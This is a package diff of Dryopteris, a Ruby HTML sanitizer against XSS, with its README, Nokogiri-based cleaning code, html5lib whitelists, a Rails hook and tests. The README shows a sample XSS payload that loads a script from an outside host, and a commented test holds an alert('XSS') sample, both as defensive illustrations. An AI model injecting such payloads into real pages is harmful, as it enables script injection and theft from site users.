mdalessio-dryopteris 0.1.0

data/README.markdown ADDED
@@ -0,0 +1,77 @@
+ Dryopteris
+ ==========
+
+ Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
+
+ * [Dryopteris erythrosora](http://en.wikipedia.org/wiki/Dryopteris_erythrosora)
+ * [XSS Attacks](http://en.wikipedia.org/wiki/Cross-site_scripting)
+
+ Usage
+ -----
+
+ Let's say you run a web site, and you allow people to post HTML snippets.
+
+ Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:
+
+     <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
+ Oooh, that could be bad. Here's how to fix it:
+
+     safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
+
+ Yeah, it's that easy.
+
+ In this example, <tt>safe\_html\_snippet</tt> will have all of its __broken markup fixed__ by libxml2, and it will also be completely __sanitized of harmful tags and attributes__. That's twice as clean!
+
+
+ More Usage
+ -----
+
+ You're still here? OK, let me tell you a little something about the two different methods of sanitizing that Dryopteris offers.
+
+ ### Fragments
+
+ The first method is for _html fragments_, which are small snippets of markup such as those used in forum posts, emails and homework assignments.
+
+ Usage is the same as above:
+
+     safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
+
+ Generally speaking, unless you expect to have &lt;html&gt; and &lt;body&gt; tags in your HTML, this is the sanitizing method to use.
+
+ The only real limitation on this method is that the snippet must be a string object. (Support for IO objects was sacrificed at the altar of fixer-uppery-ness. If you need to sanitize data that's coming from an IO object, either socket or file, check out the next section on __Documents__.)
+
+ ### Documents
+
+ Sometimes you need to sanitize an entire HTML document. (Well, maybe not _you_, but other people, certainly.)
+
+     safe_html_document = Dryopteris.sanitize_document(dangerous_html_document)
+
+ The returned string will contain exactly one (1) well-formed HTML document, with all broken HTML fixed and all harmful tags and attributes removed.
+
+ Coolness: <tt>dangerous\_html\_document</tt> can be a string OR an IO object (a file, a socket, or ...), which makes it particularly easy to sanitize large numbers of docs.
+
+
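+ For instance, to clean up an HTML file sitting on disk (just a sketch; <tt>dangerous.html</tt> is a made-up filename):
+
+     safe_html_document = Dryopteris.sanitize_document(File.read("dangerous.html"))
+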
+ Standing on the Shoulders of Giants
+ -----
+
+ Dryopteris uses [Nokogiri](http://nokogiri.rubyforge.org/) and [libxml2](http://xmlsoft.org/), so it's fast.
+
+ Dryopteris also takes its tag and attribute whitelists and its CSS sanitizer directly from the [html5lib](http://code.google.com/p/html5lib/) sanitizer.
+
+
+ Authors
+ -----
+ * [Bryan Helmkamp](http://www.brynary.com/)
+ * [Mike Dalessio](http://mike.daless.io/) ([twitter](http://twitter.com/flavorjones))
+
+
+ Quotes About Dryopteris
+ -----
+
+ > "dryopteris shields you from xss attacks using nokogiri and NY attitude"
+ > - [hasmanyjosh](http://blog.hasmanythrough.com/)
+
+ > "I just wanted to say thank you for your dryopteris plugin. It is by far the best sanitization I've found."
+ > - [catalystmediastudios](http://github.com/catalystmediastudios)
+
data/VERSION.yml ADDED
@@ -0,0 +1,4 @@
+ ---
+ :major: 0
+ :minor: 0
+ :patch: 0
data/lib/dryopteris/rails_extension.rb ADDED
@@ -0,0 +1,46 @@
+ require "dryopteris"
+
+ module Dryopteris
+   module RailsExtension
+     def self.included(base)
+       base.extend(ClassMethods)
+
+       # sets up default of stripping tags for all fields
+       base.class_eval do
+         before_save :sanitize_fields
+         class_inheritable_reader :dryopteris_options
+       end
+     end
+
+     module ClassMethods
+       def sanitize_fields(options = {})
+         write_inheritable_attribute(:dryopteris_options, {
+           :except => (options[:except] || []),
+           :allow_tags => (options[:allow_tags] || [])
+         })
+       end
+
+       alias_method :sanitize_field, :sanitize_fields
+     end
+
+
+     def sanitize_fields
+       self.class.columns.each do |column|
+         next unless (column.type == :string || column.type == :text)
+
+         field = column.name.to_sym
+         value = self[field]
+
+         if dryopteris_options && dryopteris_options[:except].include?(field)
+           next
+         elsif dryopteris_options && dryopteris_options[:allow_tags].include?(field)
+           self[field] = Dryopteris.sanitize(value)
+         else
+           self[field] = Dryopteris.strip_tags(value)
+         end
+       end
+
+     end
+
+   end
+ end
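A note on the Rails extension above: the README doesn't document it, so here is a rough usage sketch. The `Post` model and its column names are invented for illustration, and it assumes the module is mixed into an ActiveRecord class on a Rails version old enough to provide `class_inheritable_reader` and `write_inheritable_attribute`:

    class Post < ActiveRecord::Base
      include Dryopteris::RailsExtension

      # strip tags from every string/text column, except leave :raw_source
      # untouched and run the whitelist sanitizer (not a full strip) on :body
      sanitize_fields :except => [:raw_source], :allow_tags => [:body]
    end

With that in place, the `before_save` hook registered by the module rewrites the affected columns before each save.
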
data/lib/dryopteris/sanitize.rb ADDED
@@ -0,0 +1,135 @@
+ require 'rubygems'
+ gem 'nokogiri', '>=1.0.5'
+ require 'nokogiri'
+ require 'cgi'
+
+ require "dryopteris/whitelist"
+
+ module Dryopteris
+
+   class << self
+     def strip_tags(string_or_io, encoding=nil)
+       return nil if string_or_io.nil?
+       return "" if string_or_io.strip.size == 0
+
+       doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+       body_element = doc.at("/html/body")
+       return "" if body_element.nil?
+       body_element.inner_text
+     end
+
+     def sanitize(string, encoding=nil)
+       return nil if string.nil?
+       return "" if string.strip.size == 0
+
+       string = "<html><body>" + string + "</body></html>"
+       doc = Nokogiri::HTML.parse(string, nil, encoding)
+       body = doc.xpath("/html/body").first
+       return "" if body.nil?
+       body.children.each do |node|
+         traverse_conditionally_top_down(node, :sanitize_node)
+       end
+       body.children.map { |x| x.to_xml }.join
+     end
+
+     def sanitize_document(string_or_io, encoding=nil)
+       return nil if string_or_io.nil?
+       return "" if string_or_io.strip.size == 0
+
+       doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
+       elements = doc.xpath("/html/head/*","/html/body/*")
+       return "" if (elements.nil? || elements.empty?)
+       elements.each do |node|
+         traverse_conditionally_top_down(node, :sanitize_node)
+       end
+       doc.root.to_xml
+     end
+
+     private
+     def traverse_conditionally_top_down(node, method_name)
+       return if send(method_name, node)
+       node.children.each {|j| traverse_conditionally_top_down(j, method_name)}
+     end
+
+     def remove_tags_from_node(node)
+       replacement_killer = Nokogiri::XML::Text.new(node.text, node.document)
+       node.add_next_sibling(replacement_killer)
+       node.remove
+       return true
+     end
+
+     def sanitize_node(node)
+       case node.type
+       when 1 # Nokogiri::XML::Node::ELEMENT_NODE
+         if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
+           node.attributes.each do |attr|
+             node.remove_attribute(attr.first) unless HashedWhiteList::ALLOWED_ATTRIBUTES[attr.first]
+           end
+           node.attributes.each do |attr|
+             if HashedWhiteList::ATTR_VAL_IS_URI[attr.first]
+               # this block lifted nearly verbatim from HTML5 sanitization
+               val_unescaped = CGI.unescapeHTML(attr.last.to_s).gsub(/`|[\000-\040\177\s]+|\302[\200-\240]/,'').downcase
+               if val_unescaped =~ /^[a-z0-9][-+.a-z0-9]*:/ and HashedWhiteList::ALLOWED_PROTOCOLS[val_unescaped.split(':')[0]].nil?
+                 node.remove_attribute(attr.first)
+               end
+             end
+           end
+           if node.attributes['style']
+             node['style'] = sanitize_css(node.attributes['style'])
+           end
+           return false
+         end
+       when 3 # Nokogiri::XML::Node::TEXT_NODE
+         return false
+       when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
+         return false
+       end
+       replacement_killer = Nokogiri::XML::Text.new(node.to_s, node.document)
+       node.add_next_sibling(replacement_killer)
+       node.remove
+       return true
+     end
+
+
+     # this was lifted nearly verbatim from the html5 sanitizer
+     def sanitize_css(style)
+       # disallow urls
+       style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')
+
+       # gauntlet
+       return '' unless style =~ /^([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*$/
+       return '' unless style =~ /^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$/
+
+       clean = []
+       style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop, val|
+         next if val.empty?
+         prop.downcase!
+         if HashedWhiteList::ALLOWED_CSS_PROPERTIES[prop]
+           clean << "#{prop}: #{val};"
+         elsif %w[background border margin padding].include?(prop.split('-')[0])
+           clean << "#{prop}: #{val};" unless val.split().any? do |keyword|
+             HashedWhiteList::ALLOWED_CSS_KEYWORDS[keyword].nil? and
+             keyword !~ /^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$/
+           end
+         elsif HashedWhiteList::ALLOWED_SVG_PROPERTIES[prop]
+           clean << "#{prop}: #{val};"
+         end
+       end
+
+       style = clean.join(' ')
+     end
+
+   end # self
+
+   module HashedWhiteList
+     # turn each of the whitelist arrays into a hash for faster lookup
+     WhiteList.constants.each do |constant|
+       next unless WhiteList.module_eval("#{constant}").is_a?(Array)
+       module_eval <<-CODE
+         #{constant} = {}
+         WhiteList::#{constant}.each { |c| #{constant}[c] = true ; #{constant}[c.downcase] = true }
+       CODE
+     end
+   end
+
+ end
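To make the behavior above concrete, here are a few calls whose expected return values come straight from the gem's own test suite (see test_basic.rb and test_strip_tags.rb below):

    Dryopteris.sanitize("<p>This fragment is in a p.</p>")
    # => "<p>This fragment is in a p.</p>"

    Dryopteris.strip_tags("<p>Foo</p>\n<p>Bar</p>")
    # => "Foo\nBar"

    Dryopteris.strip_tags("<script>test</script>")
    # => ""

Note also that `HashedWhiteList` simply mirrors each `WhiteList` array as a hash, so a lookup like `HashedWhiteList::ALLOWED_PROTOCOLS["mailto"]` returns `true` for whitelisted entries instead of scanning an array.
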
data/lib/dryopteris/whitelist.rb ADDED
@@ -0,0 +1,148 @@
+ #
+ #  HTML whitelist lifted from HTML5 sanitizer code
+ #  http://code.google.com/p/html5lib/
+ #
+
+ module Dryopteris
+   module WhiteList
+     # <html5_license>
+     #
+     #   Copyright (c) 2006-2008 The Authors
+     #
+     #   Contributors:
+     #   James Graham - jg307@cam.ac.uk
+     #   Anne van Kesteren - annevankesteren@gmail.com
+     #   Lachlan Hunt - lachlan.hunt@lachy.id.au
+     #   Matt McDonald - kanashii@kanashii.ca
+     #   Sam Ruby - rubys@intertwingly.net
+     #   Ian Hickson (Google) - ian@hixie.ch
+     #   Thomas Broyer - t.broyer@ltgt.net
+     #   Jacques Distler - distler@golem.ph.utexas.edu
+     #   Henri Sivonen - hsivonen@iki.fi
+     #   The Mozilla Foundation (contributions from Henri Sivonen since 2008)
+     #
+     #   Permission is hereby granted, free of charge, to any person
+     #   obtaining a copy of this software and associated documentation
+     #   files (the "Software"), to deal in the Software without
+     #   restriction, including without limitation the rights to use, copy,
+     #   modify, merge, publish, distribute, sublicense, and/or sell copies
+     #   of the Software, and to permit persons to whom the Software is
+     #   furnished to do so, subject to the following conditions:
+     #
+     #   The above copyright notice and this permission notice shall be
+     #   included in all copies or substantial portions of the Software.
+     #
+     #   THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+     #   EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+     #   MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+     #   NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
+     #   HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+     #   WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+     #   OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
+     #   DEALINGS IN THE SOFTWARE.
+     #
+     # </html5_license>
+
+     ACCEPTABLE_ELEMENTS = %w[a abbr acronym address area b big blockquote br
+       button caption center cite code col colgroup dd del dfn dir div dl dt
+       em fieldset font form h1 h2 h3 h4 h5 h6 hr i img input ins kbd label
+       legend li map menu ol optgroup option p pre q s samp select small span
+       strike strong sub sup table tbody td textarea tfoot th thead tr tt u
+       ul var]
+
+     MATHML_ELEMENTS = %w[maction math merror mfrac mi mmultiscripts mn mo
+       mover mpadded mphantom mprescripts mroot mrow mspace msqrt mstyle msub
+       msubsup msup mtable mtd mtext mtr munder munderover none]
+
+     SVG_ELEMENTS = %w[a animate animateColor animateMotion animateTransform
+       circle defs desc ellipse font-face font-face-name font-face-src g
+       glyph hkern image linearGradient line marker metadata missing-glyph
+       mpath path polygon polyline radialGradient rect set stop svg switch
+       text title tspan use]
+
+     ACCEPTABLE_ATTRIBUTES = %w[abbr accept accept-charset accesskey action
+       align alt axis border cellpadding cellspacing char charoff charset
+       checked cite class clear cols colspan color compact coords datetime
+       dir disabled enctype for frame headers height href hreflang hspace id
+       ismap label lang longdesc maxlength media method multiple name nohref
+       noshade nowrap prompt readonly rel rev rows rowspan rules scope
+       selected shape size span src start style summary tabindex target title
+       type usemap valign value vspace width xml:lang]
+
+     MATHML_ATTRIBUTES = %w[actiontype align columnalign columnalign
+       columnalign columnlines columnspacing columnspan depth display
+       displaystyle equalcolumns equalrows fence fontstyle fontweight frame
+       height linethickness lspace mathbackground mathcolor mathvariant
+       mathvariant maxsize minsize other rowalign rowalign rowalign rowlines
+       rowspacing rowspan rspace scriptlevel selection separator stretchy
+       width width xlink:href xlink:show xlink:type xmlns xmlns:xlink]
+
+     SVG_ATTRIBUTES = %w[accent-height accumulate additive alphabetic
+       arabic-form ascent attributeName attributeType baseProfile bbox begin
+       by calcMode cap-height class color color-rendering content cx cy d dx
+       dy descent display dur end fill fill-rule font-family font-size
+       font-stretch font-style font-variant font-weight from fx fy g1 g2
+       glyph-name gradientUnits hanging height horiz-adv-x horiz-origin-x id
+       ideographic k keyPoints keySplines keyTimes lang marker-end
+       marker-mid marker-start markerHeight markerUnits markerWidth
+       mathematical max min name offset opacity orient origin
+       overline-position overline-thickness panose-1 path pathLength points
+       preserveAspectRatio r refX refY repeatCount repeatDur
+       requiredExtensions requiredFeatures restart rotate rx ry slope stemh
+       stemv stop-color stop-opacity strikethrough-position
+       strikethrough-thickness stroke stroke-dasharray stroke-dashoffset
+       stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity
+       stroke-width systemLanguage target text-anchor to transform type u1
+       u2 underline-position underline-thickness unicode unicode-range
+       units-per-em values version viewBox visibility width widths x
+       x-height x1 x2 xlink:actuate xlink:arcrole xlink:href xlink:role
+       xlink:show xlink:title xlink:type xml:base xml:lang xml:space xmlns
+       xmlns:xlink y y1 y2 zoomAndPan]
+
+     ATTR_VAL_IS_URI = %w[href src cite action longdesc xlink:href xml:base]
+
+     ACCEPTABLE_CSS_PROPERTIES = %w[azimuth background-color
+       border-bottom-color border-collapse border-color border-left-color
+       border-right-color border-top-color clear color cursor direction
+       display elevation float font font-family font-size font-style
+       font-variant font-weight height letter-spacing line-height overflow
+       pause pause-after pause-before pitch pitch-range richness speak
+       speak-header speak-numeral speak-punctuation speech-rate stress
+       text-align text-decoration text-indent unicode-bidi vertical-align
+       voice-family volume white-space width]
+
+     ACCEPTABLE_CSS_KEYWORDS = %w[auto aqua black block blue bold both bottom
+       brown center collapse dashed dotted fuchsia gray green !important
+       italic left lime maroon medium none navy normal nowrap olive pointer
+       purple red right solid silver teal top transparent underline white
+       yellow]
+
+     ACCEPTABLE_SVG_PROPERTIES = %w[fill fill-opacity fill-rule stroke
+       stroke-width stroke-linecap stroke-linejoin stroke-opacity]
+
+     ACCEPTABLE_PROTOCOLS = %w[ed2k ftp http https irc mailto news gopher nntp
+       telnet webcal xmpp callto feed urn aim rsync tag ssh sftp rtsp afs]
+
+     # subclasses may define their own versions of these constants
+     ALLOWED_ELEMENTS = ACCEPTABLE_ELEMENTS + MATHML_ELEMENTS + SVG_ELEMENTS
+     ALLOWED_ATTRIBUTES = ACCEPTABLE_ATTRIBUTES + MATHML_ATTRIBUTES + SVG_ATTRIBUTES
+     ALLOWED_CSS_PROPERTIES = ACCEPTABLE_CSS_PROPERTIES
+     ALLOWED_CSS_KEYWORDS = ACCEPTABLE_CSS_KEYWORDS
+     ALLOWED_SVG_PROPERTIES = ACCEPTABLE_SVG_PROPERTIES
+     ALLOWED_PROTOCOLS = ACCEPTABLE_PROTOCOLS
+
+     VOID_ELEMENTS = %w[
+       base
+       link
+       meta
+       hr
+       br
+       img
+       embed
+       param
+       area
+       col
+       input
+     ]
+   end
+ end
data/lib/dryopteris.rb ADDED
@@ -0,0 +1,7 @@
+ $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__))) unless $LOAD_PATH.include?(File.expand_path(File.dirname(__FILE__)))
+
+ require "dryopteris/sanitize"
+
+ module Dryopteris
+   VERSION = '0.1'
+ end
data/test/helper.rb ADDED
@@ -0,0 +1,2 @@
+ require 'test/unit'
+ require File.expand_path(File.join(File.dirname(__FILE__), "..", "lib", "dryopteris"))
data/test/test_basic.rb ADDED
@@ -0,0 +1,66 @@
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
+
+ class TestBasic < Test::Unit::TestCase
+
+   def test_nil
+     assert_nil Dryopteris.sanitize(nil)
+   end
+
+   def test_empty_string
+     assert_equal "", Dryopteris.sanitize("")
+   end
+
+   def test_removal_of_illegal_tag
+     html = <<-HTML
+       following this there should be no jim tag
+       <jim>jim</jim>
+       was there?
+     HTML
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     assert sane.xpath("//jim").empty?
+   end
+
+   def test_removal_of_illegal_attribute
+     html = "<p class=bar foo=bar abbr=bar />"
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     node = sane.xpath("//p").first
+     assert node.attributes['class']
+     assert node.attributes['abbr']
+     assert_nil node.attributes['foo']
+   end
+
+   def test_removal_of_illegal_url_in_href
+     html = <<-HTML
+       <a href='jimbo://jim.jim/'>this link should have its href removed because of illegal url</a>
+       <a href='http://jim.jim/'>this link should be fine</a>
+     HTML
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     nodes = sane.xpath("//a")
+     assert_nil nodes.first.attributes['href']
+     assert nodes.last.attributes['href']
+   end
+
+   def test_css_sanitization
+     html = "<p style='background-color: url(\"http://foo.com/\") ; background-color: #000 ;' />"
+     sane = Nokogiri::HTML(Dryopteris.sanitize(html))
+     assert_match(/#000/, sane.inner_html)
+     assert_no_match(/foo\.com/, sane.inner_html)
+   end
+
+   def test_fragment_with_no_tags
+     assert_equal "This fragment has no tags.", Dryopteris.sanitize("This fragment has no tags.")
+   end
+
+   def test_fragment_in_p_tag
+     assert_equal "<p>This fragment is in a p.</p>", Dryopteris.sanitize("<p>This fragment is in a p.</p>")
+   end
+
+   def test_fragment_in_a_nontrivial_p_tag
+     assert_equal " \n<p>This fragment is in a p.</p>", Dryopteris.sanitize(" \n<p foo='bar'>This fragment is in a p.</p>")
+   end
+
+   def test_fragment_in_p_tag_plus_stuff
+     assert_equal "<p>This fragment is in a p.</p>foo<strong>bar</strong>", Dryopteris.sanitize("<p>This fragment is in a p.</p>foo<strong>bar</strong>")
+   end
+
+ end
data/test/test_sanitizer.rb ADDED
@@ -0,0 +1,141 @@
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
+
+ class SanitizeTest < Test::Unit::TestCase
+   include Dryopteris
+
+   def sanitize_html stream
+     Dryopteris.sanitize(stream)
+   end
+
+   def sanitize_doc stream
+     Dryopteris.sanitize_document(stream)
+   end
+
+   def check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
+     # libxml uses double-quotes, so let's swappo-boppo our quotes before comparing.
+     assert_equal htmloutput, sanitize_html(input).gsub(/"/,"'"), input
+
+     doc = sanitize_doc(input).gsub(/"/,"'")
+     assert doc.include?(htmloutput), "#{input}:\n#{doc}\nshould include:\n#{htmloutput}"
+   end
+
+   WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
+     define_method "test_should_allow_#{tag_name}_tag" do
+       input = "<#{tag_name} title='1'>foo <bad>bar</bad> baz</#{tag_name}>"
+       htmloutput = "<#{tag_name.downcase} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name.downcase}>"
+       xhtmloutput = "<#{tag_name} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name}>"
+       rexmloutput = xhtmloutput
+
+       ##
+       ##  these special cases are HTML5-tokenizer-dependent.
+       ##  libxml2 cleans up HTML differently, and I trust that.
+       ##
+       # if %w[caption colgroup optgroup option tbody td tfoot th thead tr].include?(tag_name)
+       #   htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+       #   xhtmloutput = htmloutput
+       # elsif tag_name == 'col'
+       #   htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+       #   xhtmloutput = htmloutput
+       #   rexmloutput = "<col title='1' />"
+       # elsif tag_name == 'table'
+       #   htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt;baz<table title='1'> </table>"
+       #   xhtmloutput = htmloutput
+       # elsif tag_name == 'image'
+       #   htmloutput = "<image title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+       #   xhtmloutput = htmloutput
+       #   rexmloutput = "<image title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</image>"
+       if WhiteList::VOID_ELEMENTS.include?(tag_name)
+         if Nokogiri::LIBXML_VERSION <= "2.6.16"
+           htmloutput = "<#{tag_name} title='1'/><p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+         else
+           htmloutput = "<#{tag_name} title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
+         end
+         xhtmloutput = htmloutput
+         # htmloutput += '<br/>' if tag_name == 'br'
+         rexmloutput = "<#{tag_name} title='1' />"
+       end
+       check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
+     end
+   end
+
+   ##
+   ##  libxml2 downcases tag names as it parses, so this is unnecessary.
+   ##
+   # WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
+   #   define_method "test_should_forbid_#{tag_name.upcase}_tag" do
+   #     input = "<#{tag_name.upcase} title='1'>foo <bad>bar</bad> baz</#{tag_name.upcase}>"
+   #     output = "&lt;#{tag_name.upcase} title=\"1\"&gt;foo &lt;bad&gt;bar&lt;/bad&gt; baz&lt;/#{tag_name.upcase}&gt;"
+   #     check_sanitization(input, output, output, output)
+   #   end
+   # end
+
+   WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
+     next if attribute_name == 'style'
+     next if attribute_name =~ /:/ && Nokogiri::LIBXML_VERSION <= '2.6.16'
+     define_method "test_should_allow_#{attribute_name}_attribute" do
+       input = "<p #{attribute_name}='foo'>foo <bad>bar</bad> baz</p>"
+       output = "<p #{attribute_name}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+       htmloutput = "<p #{attribute_name.downcase}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+       check_sanitization(input, htmloutput, output, output)
+     end
+   end
+
+   ##
+   ##  libxml2 downcases attributes as it parses, so this is unnecessary.
+   ##
+   # WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
+   #   define_method "test_should_forbid_#{attribute_name.upcase}_attribute" do
+   #     input = "<p #{attribute_name.upcase}='display: none;'>foo <bad>bar</bad> baz</p>"
+   #     output = "<p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
+   #     check_sanitization(input, output, output, output)
+   #   end
+   # end
+
+   WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
+     define_method "test_should_allow_#{protocol}_uris" do
+       input = %(<a href="#{protocol}">foo</a>)
+       output = "<a href='#{protocol}'>foo</a>"
+       check_sanitization(input, output, output, output)
+     end
+   end
+
+   WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
+     define_method "test_should_allow_uppercase_#{protocol}_uris" do
+       input = %(<a href="#{protocol.upcase}">foo</a>)
+       output = "<a href='#{protocol.upcase}'>foo</a>"
+       check_sanitization(input, output, output, output)
+     end
+   end
+
+   if Nokogiri::LIBXML_VERSION > '2.6.16'
+     def test_should_handle_astral_plane_characters
+       input = "<p>&#x1d4b5; &#x1d538;</p>"
+       output = "<p>\360\235\222\265 \360\235\224\270</p>"
+       check_sanitization(input, output, output, output)
+
+       input = "<p><tspan>\360\235\224\270</tspan> a</p>"
+       output = "<p><tspan>\360\235\224\270</tspan> a</p>"
+       check_sanitization(input, output, output, output)
+     end
+   end
+
+   # This affects only NS4. Is it worth fixing?
+   # def test_javascript_includes
+   #   input = %(<div size="&{alert('XSS')}">foo</div>)
+   #   output = "<div>foo</div>"
+   #   check_sanitization(input, output, output, output)
+   # end
+
+   # html5_test_files('sanitizer').each do |filename|
+   #   JSON::parse(open(filename).read).each do |test|
+   #     define_method "test_#{test['name']}" do
+   #       check_sanitization(
+   #         test['input'],
+   #         test['output'],
+   #         test['xhtml'] || test['output'],
+   #         test['rexml'] || test['output']
+   #       )
+   #     end
+   #   end
+   # end
+ end
data/test/test_strip_tags.rb ADDED
@@ -0,0 +1,35 @@
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
+
+ class TestStripTags < Test::Unit::TestCase
+
+   def test_nil
+     assert_nil Dryopteris.strip_tags(nil)
+   end
+
+   def test_empty_string
+     assert_equal Dryopteris.strip_tags(""), ""
+   end
+
+   def test_return_empty_string_when_nothing_left
+     assert_equal "", Dryopteris.strip_tags('<script>test</script>')
+   end
+
+   def test_removal_of_all_tags
+     html = <<-HTML
+       What's up <strong>doc</strong>?
+     HTML
+     stripped = Dryopteris.strip_tags(html)
+     assert_equal "What's up doc?".strip, stripped.strip
+   end
+
+   def test_dont_remove_whitespace
+     html = "Foo\nBar"
+     assert_equal html, Dryopteris.strip_tags(html)
+   end
+
+   def test_dont_remove_whitespace_between_tags
+     html = "<p>Foo</p>\n<p>Bar</p>"
+     assert_equal "Foo\nBar", Dryopteris.strip_tags(html)
+   end
+
+ end
metadata ADDED
@@ -0,0 +1,75 @@
+ --- !ruby/object:Gem::Specification
+ name: mdalessio-dryopteris
+ version: !ruby/object:Gem::Version
+   version: 0.1.0
+ platform: ruby
+ authors:
+ - Bryan Helmkamp
+ - Mike Dalessio
+ autorequire:
+ bindir: bin
+ cert_chain: []
+
+ date: 2009-02-10 00:00:00 -08:00
+ default_executable:
+ dependencies:
+ - !ruby/object:Gem::Dependency
+   name: nokogiri
+   version_requirement:
+   version_requirements: !ruby/object:Gem::Requirement
+     requirements:
+     - - ">"
+       - !ruby/object:Gem::Version
+         version: 0.0.0
+     version:
+ description: Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
+ email:
+ - bryan@brynary.com
+ - mike.dalessio@gmail.com
+ executables: []
+
+ extensions: []
+
+ extra_rdoc_files: []
+
+ files:
+ - README.markdown
+ - VERSION.yml
+ - lib/dryopteris
+ - lib/dryopteris/rails_extension.rb
+ - lib/dryopteris/sanitize.rb
+ - lib/dryopteris/whitelist.rb
+ - lib/dryopteris.rb
+ - test/test_basic.rb
+ - test/test_strip_tags.rb
+ - test/helper.rb
+ - test/test_sanitizer.rb
+ has_rdoc: true
+ homepage: http://github.com/brynary/dryopteris/tree/master
+ post_install_message:
+ rdoc_options:
+ - --inline-source
+ - --charset=UTF-8
+ require_paths:
+ - lib
+ required_ruby_version: !ruby/object:Gem::Requirement
+   requirements:
+   - - ">="
+     - !ruby/object:Gem::Version
+       version: "0"
+   version:
+ required_rubygems_version: !ruby/object:Gem::Requirement
+   requirements:
+   - - ">="
+     - !ruby/object:Gem::Version
+       version: "0"
+   version:
+ requirements: []
+
+ rubyforge_project:
+ rubygems_version: 1.2.0
+ signing_key:
+ specification_version: 2
+ summary: HTML sanitization using Nokogiri
+ test_files: []
+